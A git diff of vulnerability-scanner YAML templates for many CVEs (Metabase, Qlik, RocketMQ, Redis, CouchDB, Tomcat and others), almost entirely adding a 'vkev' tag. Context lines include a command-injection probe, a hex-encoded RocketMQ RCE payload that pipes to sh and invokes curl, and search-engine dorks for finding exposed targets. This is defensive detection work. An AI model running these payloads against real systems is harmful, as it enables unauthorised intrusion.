a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index 7b980ec96de..c106e1f3dfd 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -31,7 +31,7 @@ info: - '"Server: thttpd/2.25b 29dec2003" content-length:1133' - '"server: thttpd/2.25b 29dec2003" content-length:1133' max-req: 1 - tags: cve2023,cve,fujitsu,ip-series + tags: cve2023,cve,fujitsu,ip-series,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 34610ebddf2..17dfc5b37fb 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -37,7 +37,7 @@ info: - title="metabase" - app="metabase" google-query: intitle:"metabase" - tags: cve2023,cve,metabase,oss,rce + tags: cve2023,cve,metabase,oss,rce,vkev variables: file: "./plugins/vertica.metabase-driver.jar" diff --git a/http/cves/2023/CVE-2023-38950.yaml b/http/cves/2023/CVE-2023-38950.yaml index 66511793366..746c5e6c60e 100644 --- a/http/cves/2023/CVE-2023-38950.yaml +++ b/http/cves/2023/CVE-2023-38950.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"biotime" fofa-query: title="biotime" google-query: intitle:"biotime" - tags: cve,cve2023,zkteco,biotime,lfr,kev + tags: cve,cve2023,zkteco,biotime,lfr,kev,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index 0f911133d99..fc8367a1a60 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -32,7 +32,7 @@ info: shodan-query: - title:"FileMage" - cpe:"cpe:2.3:o:microsoft:windows" - tags: cve2023,cve,packetstorm,lfi,filemage,microsoft + tags: cve2023,cve,packetstorm,lfi,filemage,microsoft,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index 83295beb4bc..ff010a1b776 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: wbce product: wbce_cms - tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive + tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-40000.yaml b/http/cves/2023/CVE-2023-40000.yaml index b1e06babaeb..898f8b58868 100644 --- a/http/cves/2023/CVE-2023-40000.yaml +++ b/http/cves/2023/CVE-2023-40000.yaml @@ -27,7 +27,7 @@ info: shodan-query: 'vuln:CVE-2023-40000' fofa-query: "wp-content/plugins/litespeed-cache/" google-query: inurl:"/wp-content/plugins/litespeed-cache/" - tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,litespeed-cache,xss,intrusive + tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,litespeed-cache,xss,intrusive,vkev variables: marker: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-41109.yaml b/http/cves/2023/CVE-2023-41109.yaml index 473833c71d4..6a20c09a065 100644 --- a/http/cves/2023/CVE-2023-41109.yaml +++ b/http/cves/2023/CVE-2023-41109.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: patton product: smartnode_sn200 - tags: cve,cve2023,smartnode,voip,patton + tags: cve,cve2023,smartnode,voip,patton,vkev variables: payload: "echo CVE-2023-41109 | md5sum" diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index 0e0fdc48cfd..ebd6d5c7da6 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -36,7 +36,7 @@ info: - icon_hash=-74348711 - body="qlik" google-query: intitle:"qlik-sense" - tags: cve2023,cve,kev,qlik,smuggling,windows + tags: cve2023,cve,kev,qlik,smuggling,windows,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index 54bc54a95df..5a072ed286f 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -35,7 +35,7 @@ info: - icon_hash=-74348711 - body="qlik" google-query: intitle:"qlik-sense" - tags: cve2023,cve,qlik,traversal,kev,windows + tags: cve2023,cve,qlik,traversal,kev,windows,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-41599.yaml b/http/cves/2023/CVE-2023-41599.yaml index 27bdda55955..5810908aba8 100644 --- a/http/cves/2023/CVE-2023-41599.yaml +++ b/http/cves/2023/CVE-2023-41599.yaml @@ -24,7 +24,7 @@ info: vendor: jfinalcms_project product: jfinalcms fofa-query: body="content=\"JreCms" - tags: cve,cve2023,jrecms + tags: cve,cve2023,jrecms,vkev http: - method: GET diff --git a/javascript/cves/2018/CVE-2018-0171.yaml b/javascript/cves/2018/CVE-2018-0171.yaml index 606370ea14e..e53e60d00be 100644 --- a/javascript/cves/2018/CVE-2018-0171.yaml +++ b/javascript/cves/2018/CVE-2018-0171.yaml @@ -26,7 +26,7 @@ info: vendor: cisco product: ios shodan-query: 'port:4786 "Smart Install"' - tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev,udp + tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev,udp,vkev flow: tcp(1) && javascript(1) diff --git a/javascript/cves/2019/CVE-2019-9193.yaml b/javascript/cves/2019/CVE-2019-9193.yaml index 5b5b61b1385..b40025c9556 100644 --- a/javascript/cves/2019/CVE-2019-9193.yaml +++ b/javascript/cves/2019/CVE-2019-9193.yaml @@ -15,7 +15,7 @@ info: classification: epss-score: 0.93587 epss-percentile: 0.99831 - tags: cve,cve2018,js,network,postgresql,intrusive + tags: cve,cve2018,js,network,postgresql,intrusive,vkev javascript: diff --git a/javascript/cves/2020/CVE-2020-7247.yaml b/javascript/cves/2020/CVE-2020-7247.yaml index 51363008d9b..f5539b32d8c 100644 --- a/javascript/cves/2020/CVE-2020-7247.yaml +++ b/javascript/cves/2020/CVE-2020-7247.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: openbsd product: opensmtpd - tags: packetstorm,cve,cve2020,js,smtp,opensmtpd,network,rce,oast,kev,openbsd + tags: packetstorm,cve,cve2020,js,smtp,opensmtpd,network,rce,oast,kev,openbsd,vkev javascript: - pre-condition: | diff --git a/javascript/cves/2021/CVE-2021-35394.yaml b/javascript/cves/2021/CVE-2021-35394.yaml index 23634d33f5b..0bd044ad917 100644 --- a/javascript/cves/2021/CVE-2021-35394.yaml +++ b/javascript/cves/2021/CVE-2021-35394.yaml @@ -12,7 +12,7 @@ info: classification: epss-score: 0.94335 epss-percentile: 0.99948 - tags: cve,cve2021,realtek,rce,kev + tags: cve,cve2021,realtek,rce,kev,vkev javascript: - pre-condition: | diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml index 71d1310ac21..d0b5ee449e9 100644 --- a/network/cves/2017/CVE-2017-3881.yaml +++ b/network/cves/2017/CVE-2017-3881.yaml @@ -30,7 +30,7 @@ info: shodan-query: - product:"cisco ios http config" - cpe:"cpe:2.3:o:cisco:ios" - tags: cve2017,network,cve,cisco,rce,kev,msf,tcp + tags: cve2017,network,cve,cisco,rce,kev,msf,tcp,vkev tcp: - host: diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml index c47487bf590..336d26111c4 100644 --- a/network/cves/2018/CVE-2018-2628.yaml +++ b/network/cves/2018/CVE-2018-2628.yaml @@ -32,7 +32,7 @@ info: - http.title:"oracle peoplesoft sign-in" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: network,cve2018,cve,oracle,weblogic,deserialization,kev,tcp + tags: network,cve2018,cve,oracle,weblogic,deserialization,kev,tcp,vkev tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index f1e217297ed..813303752cc 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml @@ -31,7 +31,7 @@ info: - http.title:"oracle peoplesoft sign-in" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve,cve2018,weblogic,network,deserialization,rce,oracle,tcp + tags: cve,cve2018,weblogic,network,deserialization,rce,oracle,tcp,vkev tcp: - inputs: diff --git a/network/cves/2019/CVE-2019-5544.yaml b/network/cves/2019/CVE-2019-5544.yaml index 1d5988acb0e..cdb7af1f694 100644 --- a/network/cves/2019/CVE-2019-5544.yaml +++ b/network/cves/2019/CVE-2019-5544.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"horizon daas" fofa-query: title="horizon daas" google-query: intitle:"horizon daas" - tags: cve,cve2019,vmware,esxi,heap-based,bufferoverflow,kev,dos,intrusive + tags: cve,cve2019,vmware,esxi,heap-based,bufferoverflow,kev,dos,intrusive,vkev tcp: - inputs: diff --git a/network/cves/2020/CVE-2020-0796.yaml b/network/cves/2020/CVE-2020-0796.yaml index 1d2d6ff2e8f..25837bd2e2d 100644 --- a/network/cves/2020/CVE-2020-0796.yaml +++ b/network/cves/2020/CVE-2020-0796.yaml @@ -25,7 +25,7 @@ info: product: windows_10_1903 shodan-query: cpe:"cpe:2.3:o:microsoft:windows_10_1903" verified: true - tags: cve,cve2020,microsoft,smb,kev + tags: cve,cve2020,microsoft,smb,kev,vkev tcp: - host: diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml index bbf052f00da..007aba8cd4e 100644 --- a/network/cves/2020/CVE-2020-1938.yaml +++ b/network/cves/2020/CVE-2020-1938.yaml @@ -31,7 +31,7 @@ info: - http.title:"apache tomcat" fofa-query: title="apache tomcat" google-query: intitle:"apache tomcat" - tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp,tcp + tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp,tcp,vkev tcp: - host: diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml index 0b4df08bfed..636eca74c10 100644 --- a/network/cves/2022/CVE-2022-0543.yaml +++ b/network/cves/2022/CVE-2022-0543.yaml @@ -32,7 +32,7 @@ info: shodan-query: - redis_version - redis - tags: cve,cve2022,network,redis,unauth,rce,kev,tcp + tags: cve,cve2022,network,redis,unauth,rce,kev,tcp,vkev tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml index f32bae4b056..e96ff3a6c5a 100644 --- a/network/cves/2022/CVE-2022-24706.yaml +++ b/network/cves/2022/CVE-2022-24706.yaml @@ -33,7 +33,7 @@ info: - product:"CouchDB" - product:"couchdb" - cpe:"cpe:2.3:a:apache:couchdb" - tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp + tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp,vkev variables: name_msg: "00156e00050007499c4141414141414041414141414141" diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index a55234f6732..fd2c8c65b2f 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: inglorion product: muhttpd - tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion,tcp + tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion,tcp,vkev tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml index 1228e273175..99eceafb82e 100644 --- a/network/cves/2023/CVE-2023-33246.yaml +++ b/network/cves/2023/CVE-2023-33246.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"rocketmq" - intitle:"rocketmq-console-ng" - tags: packetstorm,network,cve2023,cve,rocketmq,rce,oast,intrusive,apache,tcp,kev + tags: packetstorm,network,cve2023,cve,rocketmq,rce,oast,intrusive,apache,tcp,kev,vkev variables: part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}' part_b: '{{ hex_decode("3b0a") }}' diff --git a/passive/cves/2018/CVE-2018-17207.yaml b/passive/cves/2018/CVE-2018-17207.yaml index b4d094dac40..a2d8abb8ce9 100644 --- a/passive/cves/2018/CVE-2018-17207.yaml +++ b/passive/cves/2018/CVE-2018-17207.yaml @@ -25,7 +25,7 @@ info: max-request: 1 publicwww-query: "/wp-content/plugins/duplicator" google-query: inurl:"/wp-content/plugins/duplicator" - tags: cve,cve2018,wordpress,duplicator,rce + tags: cve,cve2018,wordpress,duplicator,rce,vkev # Uncomment to attempt RCE, but note that it modifies database details, potentially causing the website to not function properly. # variables: diff --git a/passive/cves/2022/CVE-2022-41352.yaml b/passive/cves/2022/CVE-2022-41352.yaml index 683cc9a1395..bad10d67ef0 100644 --- a/passive/cves/2022/CVE-2022-41352.yaml +++ b/passive/cves/2022/CVE-2022-41352.yaml @@ -25,7 +25,7 @@ info: - http.favicon.hash:"1624375939" - http.html:"Zimbra Collaboration Suite Web Client" fofa-query: icon_hash="1624375939" - tags: cve,cve2022,zimbra,kev,file-upload,passive + tags: cve,cve2022,zimbra,kev,file-upload,passive,vkev http: - method: GET